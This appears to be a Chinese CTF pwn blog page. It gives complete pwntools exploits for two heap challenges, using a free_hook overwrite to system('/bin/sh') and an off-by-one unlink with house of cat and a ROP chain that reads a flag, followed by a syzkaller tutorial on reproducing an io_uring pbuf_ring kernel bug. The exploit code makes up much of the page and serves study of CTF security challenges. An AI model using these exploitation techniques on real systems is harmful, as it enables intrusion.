for i in range(0x64):
sleep(0.01)
print(str(i))
message("c"*0x10,0x100,"d"*0x100)
message("c"*0x10,0x50,"k"*0x50)

switch("4"*0x50)
dele("5"*0x50)
dele("c"*0x10)
#dele("6"*0x50)

switch(p64(free_hook))
success("free_hook >> "+hex(free_hook))

message("3"*0x400,0x50,p64(system))
message("3"*0x400,0x50,p64(system))
message("3"*0x400,0x50,p64(system))

switch("/bin/sh\x00"*0x20)

p.interactive()

simpleinterpreter

1
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.6) stable release version 2.27
1
2
3
4
5
6
simpleinterpreter: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=aab6c7bbf53da3a2a56abc81abda22d25640fc3a, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

入侵思路

一个 C 语言的解释器,参考源码如下:

禁用了 system 但没有禁用 free,因此直接修改 free_hook 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './simpleinterpreter1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.27.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('101.200.122.251','13410')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x034A0)\n")
pause()

def cmd(op):
sla(">",str(op))

def code(payload):
sla( b'Code size: ',str(len(payload)+1))
sa("interpret:",payload)
sn(b'\xff')

payload = '''
void main()
{
int libc_base, system, free_hook;
libc_base = (int)malloc(0x21000) - 0x498010 - 0x19000;
printf("libc_base -> %p", libc_base);
system = libc_base + 0x4f420;
free_hook = libc_base + 0x3ed8e8;
*(int*)free_hook = system;
free("/bin/sh");
}
'''

#debug()
code(payload)

p.interactive()

warmup

1
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.5) stable release version 2.35.
1
2
3
4
5
6
warmup: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b5eb1d744b7c4d95ceafe7ff2e89f659cab2f9bc, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开
1
2
3
4
5
6
7
8
9
10
11
12
13
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x09 0xc000003e if (A != ARCH_X86_64) goto 0011
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x08 0x00 0x00000002 if (A == open) goto 0012
0004: 0x15 0x07 0x00 0x00000000 if (A == read) goto 0012
0005: 0x15 0x06 0x00 0x00000001 if (A == write) goto 0012
0006: 0x15 0x05 0x00 0x0000003c if (A == exit) goto 0012
0007: 0x15 0x04 0x00 0x000000e7 if (A == exit_group) goto 0012
0008: 0x15 0x03 0x00 0x00000009 if (A == mmap) goto 0012
0009: 0x15 0x02 0x00 0x0000000a if (A == mprotect) goto 0012
0010: 0x15 0x01 0x00 0x0000000c if (A == brk) goto 0012
0011: 0x06 0x00 0x00 0x00000000 return KILL
0012: 0x06 0x00 0x00 0x7fff0000 return ALLOW

漏洞分析

有 off-by-one 漏洞:

1
chunk_list[i][(int)read(0, chunk_list[i], size)] = 0;

入侵思路

核心考点为无泄露 unlink attack,可以考虑如下的堆风水:

  • 获取两个 unsorted chunk 进行合并,其中的第二个 chunk 末地址必须为 \x00(遗留下 FD BK 指针)
  • 重新申请大 unsorted chunk 后释放(不破坏原来的 heap 结构),然后再次进行分割,使第二个 chunk 的末尾地址为 \x30 或者 \x40 \x50 等等(有一定偏移的地址都可以)
  • 之后利用 unsortedbin 进行调整,在 FD->bk 和 BK->fd 中写入 \x30,然后覆盖为 \x00

由于该程序至少覆盖两字节,因此打 unlink 时只有 1/16 的概率可以打通(如果有更好的堆风水可以避免这一点)

最后劫持 stderr 打 house of cat 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './warmup1'

context.os='linux'
context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"
"""
local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')
"""
def debug():
gdb.attach(p,"")
#gdb.attach(p,"b *$rebase()\n")
#pause()

def cmd(op):
sla(">>",str(op))

def add(size,data="\n"):
cmd(1)
sla("Size",str(size))
sa("Note",data)

def show(index):
cmd(2)
sla("Index",str(index+1))

def dele(index):
cmd(3)
sla("Index",str(index+1))


#debug()
def pwn():
add(0x52f0) #null
add(0x418) #0
add(0x1f0) #1
add(0x428) #2
add(0x438) #3
add(0x208) #4
add(0x428) #5
add(0x208) #6

dele(0)
dele(3)
dele(5)
dele(2)

sleep(0.1)
add(0x440,0x428*'a'+p32(0xc91)) #0
add(0x418) #3 0x2b0

add(0x418,"\x00") #2 0xd20 - over \x00 to bk/fd
add(0x428) #5 0x370

dele(3) # 0x2b0 - bk=0xd20
dele(2) # 0xd20

add(0x418,'a'*8) #2 修复fd->bk(低位覆盖\x00)
add(0x418) #3

dele(3) # 0xd20
dele(5) # 0x350 - fd=0xd20

add(0x9f8) #3 make 0x350 to large
add(0x428,'\x00') #5 修复bk->fd(低位覆盖\x00)

dele(6)
sleep(0.1)
add(0x208,0x200*'a'+p64(0xc90))

add(0x418) #7
add(0x208) #8

sleep(0.1)
dele(3) # unlink

add(0x430,flat(0,0,0,p64(0x421))) #3
add(0x1600) #9

show(4)
ru("Note: ")
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
libc_base=leak_addr-0x21a310
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

show(5)
ru("Note: ")
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
heap=leak_addr-0x55b0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap))

setcontext=libc_base+libc.sym['setcontext']+61
open_libc=libc_base+libc.sym['open']
read_libc=libc_base+libc.sym['read']
write_libc=libc_base+libc.sym['write']
success("setcontext >> "+hex(setcontext))

IO_list_all = libc_base+0x21a680
stderr=libc_base+libc.sym['stderr']
stderr = libc_base+libc.sym['stderr']
IO_wfile_jumps = libc_base+libc.sym['_IO_wfile_jumps']
_IO_stdfile_2_lock = libc_base+0x21ba60
success("IO_list_all >> "+hex(IO_list_all))
success("stderr >> "+hex(stderr))
success("IO_wfile_jumps >> "+hex(IO_wfile_jumps))

pop_rax_ret=0x0000000000045eb0+libc_base
pop_rdi_ret=0x000000000002a3e5+libc_base
pop_rsi_ret=0x000000000002be51+libc_base
pop_rdx_ret=0x00000000000796a2+libc_base
ret=0x0000000000029cd6+libc_base
syscall_ret = 0x0000000000114059+libc_base
success("pop_rdi_ret >> "+hex(pop_rdi_ret))
success("pop_rsi_ret >> "+hex(pop_rsi_ret))
success("pop_rdx_ret >> "+hex(pop_rdx_ret))
success("ret >> "+hex(ret))

next_chain = 0
fake_io_addr = heap + 0x6650 - 0x10
payload_addr = heap
success("fake_io_addr >> "+hex(fake_io_addr))

ORW_addr = heap + 0x5be0
flag_addr = heap + 0x5be0 + 0x200

fake_IO_FILE = "/bin/sh\x00" #_flags=rdi
fake_IO_FILE += p64(0)*5
fake_IO_FILE += p64(1)+p64(2) # rcx!=0(FSOP)
fake_IO_FILE += p64(ORW_addr-0xa0) #_IO_backup_base=rdx
fake_IO_FILE += p64(setcontext) #_IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x58, '\x00')
fake_IO_FILE += p64(0) # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x78, '\x00')
fake_IO_FILE += p64(_IO_stdfile_2_lock) # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0x90, '\x00')
fake_IO_FILE += p64(fake_io_addr+0x30+0x10)#_wide_data,rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xb0, '\x00')
fake_IO_FILE += p64(0) #mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xc8, '\x00')
fake_IO_FILE += p64(IO_wfile_jumps+0x10) # vtable=IO_wfile_jumps+0x10
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x30+0x20) # rax2_addr

chain = p64(ORW_addr)
# open(heap_addr,0)
chain += p64(pop_rax_ret) + p64(2)
chain += p64(pop_rdi_ret) + p64(flag_addr)
chain += p64(pop_rsi_ret) + p64(0)
chain += p64(pop_rdx_ret) + p64(0)
chain += p64(syscall_ret)
# read(3,heap_addr,0x60)
chain += p64(pop_rax_ret) + p64(0)
chain += p64(pop_rdi_ret) + p64(3)
chain += p64(pop_rsi_ret) + p64(flag_addr)
chain += p64(pop_rdx_ret) + p64(0x60)
chain += p64(syscall_ret)
# write(1,heap_addr,0x60)
chain += p64(pop_rax_ret) + p64(1)
chain += p64(pop_rdi_ret) + p64(1)
chain += p64(pop_rsi_ret) + p64(flag_addr)
chain += p64(pop_rdx_ret) + p64(0x60)
chain += p64(syscall_ret)

chain = chain.ljust(0x200,'\x00')
chain += './flag\x00'

sleep(0.2)
add(0x800,0x208*'p'+p64(0x431)) #11
add(0xa30,0x38*"k"+p64(0xa01)) # padding-不要破坏原来的chunk结构
#add(0x1240,0x208*'k'+p64(0x431)+0x428*'a'+p64(0x211)+0x208*'a'+p64(0xa01)+"\n"*6) # padding-不要破坏原来的chunk结构
sleep(0.2)

dele(0)
sleep(0.2)
success("chain len >> "+hex(len(chain)))
add(0x440,chain+"\n"*5) # 0-chain
sleep(0.2)

add(0x418) #12
add(0x208) #13
dele(5)
dele(4)
dele(11)

sleep(0.2)
add(0x1240,0x208*'a'+p64(0x431)+p64(libc_base+0x21a0d0)*2+p64(heap+0x1350+0x52f0+0x10)+p64(stderr-0x20)+"\n"*6) #4
sleep(0.2)

dele(12)
add(0x500) # largebin attack
add(0x410)
dele(4)

sleep(0.2)
add(0x1240,0x208*'a'+p64(0x431)+p64(libc_base+0x21a0d0)*2+p64(heap+0x1350+0x52f0+0x10)*2+"\n"*6) #4
sleep(0.2)
payload = fake_IO_FILE+p64(flag_addr)

sleep(0.2)
success("payload len >> "+hex(len(payload)))
add(0x420,payload+"\n") #13
sleep(0.2)

add(0x9008)
add(0x9008)
add(0x5300)
add(0x108,"a"*0x108)
dele(1)
pause()
add(0x600)

while True:
sleep(1)
local = 0
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('120.24.69.11','12700')

try:
pwn()
ru("{")
p.interactive()
except:
p.close()

io_uring 模块 pbuf_ring 漏洞

本篇博客主要对以下文章的内容进行复现:

1
2
/ $ uname -r
5.19.0-rc2
1
2
3
4
5
6
7
8
9
10
qemu-system-x86_64 \
-m 512M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 qiet loglevel=3 panic=-1 pti=on nokaslr" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=4 -s
  • smep,smap,pti(注意:启动参数中使用了 nokaslr,即本环境关闭了 kaslr)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -t devpts devpts /dev/pts

exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

内核源码下载:https://src.fedoraproject.org/repo/pkgs/kernel/linux-5.19-rc2.tar.xz/

  • 该漏洞已经在 5.19-rc8 中被修复
  • 在编译内核前需要先将修复的部分还原
  • 内核编译选项如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
CONFIG_KCOV=y        
CONFIG_VIRTIO_NET=y
CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y

# 可选
CONFIG_DEBUG_INFO=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y

# 关闭
# CONFIG_SLAB_FREELIST_RANDOM is not set
# CONFIG_SLAB_FREELIST_HARDENED is not set

io_uring 模块的使用

io_uring 是 Linux 内核(自 5.1 起)提供的异步 I/O 接口,名称中的 uring 指用户态与内核共享的环形队列(ring);它允许异步 I/O 操作,从而提高系统性能

  • io_uring 的使用案例包括文件读写、网络通信、数据库连接等
  • io_uring 通过使用用户空间和内核之间的通信机制,允许用户空间应用程序在异步 I/O 操作完成后立即获取结果,而无需等待内核完成磁盘操作或其他内核操作

io_uring 的实现仅仅使用了三个 syscall:

  • io_uring_setup:设置 io_uring 上下文
  • io_uring_enter:提交并获取完成任务
  • io_uring_register:注册内核用户共享的缓冲区

基于共享内存,io_uring 维护了两个与内核共享的队列:

  • submit 队列:用于存储待提交的 I/O 请求
  • completion 队列:用于存储 I/O 请求的完成状态

submit 队列中的 I/O 请求与 completion 队列中的 I/O 完成事件之间也没有固定的对应关系,内核会根据 I/O 请求的类型、文件描述符、线程池等信息自动将 I/O 请求分配到合适的队列中

  • 由于 submit / completion 队列属于用户态程序与内核的共享空间
  • 内核只需要读取 submit 队列中的参数就可以执行相应的内核态函数,不需要执行系统调用
  • 当数据执行完毕时,内核又会将返回数据写入 completion 队列

使用案例如下:(文件读写)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
// gcc -o io_uring io_uring.c -luring -fno-stack-protector -no-pie -g
#include <fcntl.h>
#include <liburing.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 1024

/*
 * Minimal liburing example: read up to BUF_SIZE bytes from "test.txt"
 * through one submission/completion round trip and print them.
 *
 * Returns 0 when the read succeeds, 1 on any setup or I/O failure.
 * liburing helpers report errors as negative errno values (they do not
 * set errno), so messages are built with strerror(-ret).
 */
int main(void) {
    const char *filename = "test.txt";
    struct io_uring ring;
    struct io_uring_sqe *sqe;
    struct io_uring_cqe *cqe;
    char *buf;
    int fd;
    int ret;
    int rc = 1;

    /* One extra zeroed byte so the data can be printed with "%s". */
    buf = calloc(1, BUF_SIZE + 1);
    if (!buf) {
        perror("calloc");
        return 1;
    }

    fd = open(filename, O_RDONLY);
    if (fd < 0) {
        perror("open");
        goto out_free;
    }

    /* Set up the io_uring instance (wraps the io_uring_setup syscall). */
    ret = io_uring_queue_init(1, &ring, 0);
    if (ret < 0) {
        fprintf(stderr, "io_uring_queue_init: %s\n", strerror(-ret));
        goto out_close;
    }

    /* Grab a free submission queue entry and describe the read request. */
    sqe = io_uring_get_sqe(&ring);
    if (!sqe) {
        fprintf(stderr, "io_uring_get_sqe: submission queue is full\n");
        goto out_ring;
    }
    io_uring_prep_read(sqe, fd, buf, BUF_SIZE, 0); /* fd, destination, length, file offset */

    /* Hand the request to the kernel (wraps the io_uring_enter syscall). */
    ret = io_uring_submit(&ring);
    if (ret < 0) {
        fprintf(stderr, "io_uring_submit: %s\n", strerror(-ret));
        goto out_ring;
    }

    /* Block until the completion for the request arrives. */
    ret = io_uring_wait_cqe(&ring, &cqe);
    if (ret < 0) {
        fprintf(stderr, "io_uring_wait_cqe: %s\n", strerror(-ret));
        goto out_ring;
    }

    /* cqe->res carries the read(2)-style result: byte count or -errno. */
    if (cqe->res < 0) {
        fprintf(stderr, "read: %s\n", strerror(-cqe->res));
    } else {
        buf[cqe->res] = '\0';
        printf("%s", buf);
        rc = 0;
    }
    /* Mark the completion as consumed so its slot can be reused. */
    io_uring_cqe_seen(&ring, cqe);

out_ring:
    io_uring_queue_exit(&ring);
out_close:
    close(fd);
out_free:
    free(buf);
    return rc;
}

syzkaller 的安装与使用

syzkaller 是 Google 开源的覆盖率引导(coverage-guided)内核 fuzz 工具,它依据系统调用描述(syzlang)自动生成并变异系统调用序列,在目标内核上执行以触发并发现内核错误

syzkaller 的主要功能包括自动生成、测试和报告内核错误

syzkaller 使用 Go 语言编写,因此需要获取 go 语言的 tool chain(经过测试,现在最新版的 syzkaller 需要 1.19 版本的 go 环境)

1
2
3
4
wget -c https://dl.google.com/go/go1.19.2.linux-amd64.tar.gz
tar -xf go1.19.2.linux-amd64.tar.gz
sudo cp go/bin/go /usr/local/bin
sudo cp -r go /usr/local

安装 syzkaller:

1
2
3
git clone https://github.com/google/syzkaller
cd syzkaller
make

编译完成后,在 syzkaller 目录下会出现一个 bin 目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
bin
├── linux_amd64
│   ├── syz-execprog
│   ├── syz-executor
│   ├── syz-fuzzer
│   └── syz-stress
├── syz-db
├── syz-manager
├── syz-mutate
├── syz-prog2c
├── syz-repro
├── syz-runtest
├── syz-sysgen
└── syz-upgrade
  • 如果 syzkaller/bin 目录下,没有 syz-extract、syz-sysgen 这两个文件的话,需要执行如下命令编译:
1
2
make bin/syz-extract
make bin/syz-sysgen

使用 syzkaller 前,先新建一个 workdir 目录,并新建一个 config 文件用于配置运行所需参数(命名为 test.cfg)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
"target": "linux/amd64",
"http": "127.0.0.1:56741",
"rpc": "127.0.0.1:0",
"sshkey" : "/home/yhellow/pwntest/image/bullseye.id_rsa", /* ssh key */
"workdir": "/home/yhellow/pwntest/workdir", /* 本地工作目录 */
"kernel_obj": "/home/yhellow/pwntest/code/linux-5.19-rc2", /* 内核源码位置 */
"syzkaller": "/home/yhellow/Tools/syzkaller", /* syzkaller工具目录 */
"sandbox": "setuid",
"type": "isolated",
"vm": {
"targets" : [ "127.0.0.1:10021" ], /* 虚拟机ip:10021 */
"pstore": false,
"target_dir" : "/root/fuzzdir", /* 虚拟机工作目录 */
"target_reboot" : false
}
}

在开始 fuzz 之前需要先配置 Image 镜像

首先安装 debootstrap,它是 linux 下用来构建一套基本根文件系统的工具:

1
sudo apt-get install debootstrap

之后在 linux 项目目录下键入以下命令,以创建 Debian Bullseye Linux image(即后文使用的 bullseye.img):

1
2
3
wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh -O create-image.sh
chmod +x create-image.sh
./create-image.sh

上述操作全部完成后,执行以下命令来尝试启动:

1
2
3
4
5
6
7
8
9
10
11
qemu-system-x86_64 \
-m 2G \
-smp 2 \
-kernel ./bzImage \
-append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0" \
-drive file=./image/bullseye.img,format=raw \
-net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \
-net nic,model=e1000 \
-enable-kvm \
-nographic \
-pidfile vm.pid 2>&1 | tee vm.log

然后测试 ssh 能否成功工作,因为 syzkaller 会用到 ssh:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
➜  pwntest ssh -i ./image/bullseye.id_rsa -p 10021 -o "StrictHostKeyChecking no" root@localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:jAtZl0868l4KSK75H0o0bE+7bXydTB4iDwkp68qT2Dk.
Please contact your system administrator.
Add correct host key in /home/yhellow/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/yhellow/.ssh/known_hosts:1
remove with:
ssh-keygen -f "/home/yhellow/.ssh/known_hosts" -R "[localhost]:10021"
Password authentication is disabled to avoid man-in-the-middle attacks.
Keyboard-interactive authentication is disabled to avoid man-in-the-middle attacks.
Linux syzkaller 5.19.2 #10 SMP PREEMPT_DYNAMIC Thu Dec 7 02:17:49 CST 2023 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
A valid context for root could not be obtained.
Last login: Wed Dec 6 18:22:26 2023
root@syzkaller:~#

如果遇到以下报错可以参考如下的解决方案:

1
kex_exchange_identification: read: Connection reset by peer

先启动内核,后启动 fuzz:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
➜  pwntest /home/yhellow/Tools/syzkaller/bin/syz-manager -config=test.cfg
2023/12/07 02:53:47 loading corpus...
2023/12/07 02:53:47 serving http on http://127.0.0.1:56741
2023/12/07 02:53:47 serving rpc on tcp://127.0.0.1:39647
2023/12/07 02:53:47 booting test machines...
2023/12/07 02:53:47 wait for the connection from test machine...
2023/12/07 02:54:01 machine check:
2023/12/07 02:54:01 syscalls : 2123/4451
2023/12/07 02:54:01 code coverage : enabled
2023/12/07 02:54:01 comparison tracing : CONFIG_KCOV_ENABLE_COMPARISONS is not enabled
2023/12/07 02:54:01 extra coverage : enabled
2023/12/07 02:54:01 delay kcov mmap : enabled
2023/12/07 02:54:01 setuid sandbox : enabled
2023/12/07 02:54:01 namespace sandbox : enabled
2023/12/07 02:54:01 Android sandbox : enabled
2023/12/07 02:54:01 fault injection : CONFIG_FAULT_INJECTION is not enabled
2023/12/07 02:54:01 leak checking : CONFIG_DEBUG_KMEMLEAK is not enabled
2023/12/07 02:54:01 net packet injection : /dev/net/tun does not exist
2023/12/07 02:54:01 net device setup : enabled
2023/12/07 02:54:01 concurrency sanitizer : /sys/kernel/debug/kcsan does not exist
2023/12/07 02:54:01 devlink PCI setup : PCI device 0000:00:10.0 is not available
2023/12/07 02:54:01 NIC VF setup : PCI device 0000:00:11.0 is not available
2023/12/07 02:54:01 USB emulation : /dev/raw-gadget does not exist
2023/12/07 02:54:01 hci packet injection : /dev/vhci does not exist
2023/12/07 02:54:01 wifi device emulation : /sys/class/mac80211_hwsim/ does not exist
2023/12/07 02:54:01 802.15.4 emulation : /sys/bus/platform/devices/mac802154_hwsim does not exist
2023/12/07 02:54:01 swap file : enabled
2023/12/07 02:54:01 corpus : 179 (deleted 0 broken)

开始 fuzz 后,在 http://127.0.0.1:56741/ 可以查看详细信息:

1701887988901

syscall description 的编写

syzkaller 自己定义了一套描述系统调用模版的声明式语言 syzlang

  • 为了提高 fuzz 效率,我们必须为目标系统量身定制这种声明文件
  • 通常一个设备节点对应一个声明文件
  • 所谓的声明文件就是一个 txt,根据 syzkaller 定义的语法,在这个 txt 文档中描述设备节点的接口信息以及参数格式

整个定制过程分为4步:

  1. 根据目标内核模块的信息,撰写符合 syzlang 语法的 txt 声明文件
  2. syz-extract 根据 txt 及 linux 源码,提取符号常量的值,生成中间文件(.const 文件)
  3. syz-sysgen 根据 const 文件生成 syzkaller 执行时使用的 go 文件
  4. 重新编译 syzkaller

使用如下命令编译自定义模块:

1
bin/syz-extract -os linux -arch amd64 -sourcedir "/home/yhellow/pwntest/code/linux-5.19.2" test.txt

编译完成后运行 syz-sysgen,然后重新编译 syzkaller:

1
2
3
bin/syz-sysgen
make generate
make
  • 该步骤将更新 /syzkaller/sys/linux/gen/amd64.go,自动添加上新定义的系统调用

syzkaller 源码中的 /syzkaller/sys/linux 目录下专门记录有各个常用模块的 syzlang 文档(已经编译完成),本实验我们需要使用 io_uring.txt

为了提高 fuzz 效率,增加了 “enable_syscalls” 项,只允许某些系统调用,能更快地触发漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
{
"target": "linux/amd64",
"http": "127.0.0.1:56741",
"rpc": "127.0.0.1:0",
"sshkey" : "/home/yhellow/pwntest/image/bullseye.id_rsa",
"workdir": "/home/yhellow/pwntest/workdir",
"kernel_obj": "/home/yhellow/pwntest/code/linux-5.19-rc2",
"syzkaller": "/home/yhellow/Tools/syzkaller",
"sandbox": "setuid",
"type": "isolated",
"enable_syscalls":[
"io_uring_register$IORING_REGISTER_PBUF_RING", /* 漏洞所在模块 */
"io_uring_setup"
],
"vm": {
"targets" : [ "127.0.0.1:10021" ],
"pstore": false,
"target_dir" : "/root/fuzzdir",
"target_reboot" : false
}
}

分析 crash 文件

所有 fuzz 出的 crash 信息都存储在 /workdir/crashes

当 syzkaller fuzz 遇到 crash 后会尝试复现该 crash:(并不是每一次都能成功)

1701933275474

当 syzkaller 成功复现 crash 时,会出现如下信息:

1701933554055

  • PS:有时候复现的 C 代码特别奇怪,也不能触发 crash,不能完全采信

漏洞分析

分析核心系统调用 syscall(__NR_io_uring_register) 对应的内核源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
/*
 * Excerpt of the io_uring_register opcode dispatcher ("......" marks
 * cases elided by the article).
 *
 * Returns -ENXIO when the ctx reference count is already dying, and
 * -EINVAL / -EACCES when a restricted ring is asked for an opcode that
 * is out of range or not enabled in ctx->restrictions.register_op.
 * Otherwise returns whatever the selected opcode handler returns;
 * unknown opcodes yield -EINVAL.
 */
static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
void __user *arg, unsigned nr_args)
__releases(ctx->uring_lock)
__acquires(ctx->uring_lock)
{
int ret;

/*
* We're inside the ring mutex, if the ref is already dying, then
* someone else killed the ctx or is already going through
* io_uring_register().
*/
if (percpu_ref_is_dying(&ctx->refs))
return -ENXIO;

/* Restricted rings may only use opcodes whose bit is set in register_op. */
if (ctx->restricted) {
if (opcode >= IORING_REGISTER_LAST)
return -EINVAL;
opcode = array_index_nospec(opcode, IORING_REGISTER_LAST);
if (!test_bit(opcode, ctx->restrictions.register_op))
return -EACCES;
}

switch (opcode) {
......
case IORING_REGISTER_PBUF_RING:
/* Requires a non-NULL argument and exactly one entry. */
ret = -EINVAL;
if (!arg || nr_args != 1)
break;
ret = io_register_pbuf_ring(ctx, arg); /* the vulnerable function analysed in this article */
break;
......
default:
ret = -EINVAL;
break;
}

return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/*
 * Register a user-provided buffer ring for the buffer group reg.bgid
 * (shown here in its vulnerable, pre-fix form).
 *
 * Copies a struct io_uring_buf_reg from @arg, validates it, obtains or
 * allocates the io_buffer_list for the group, pins the user pages that
 * back the ring and records them in the list.
 *
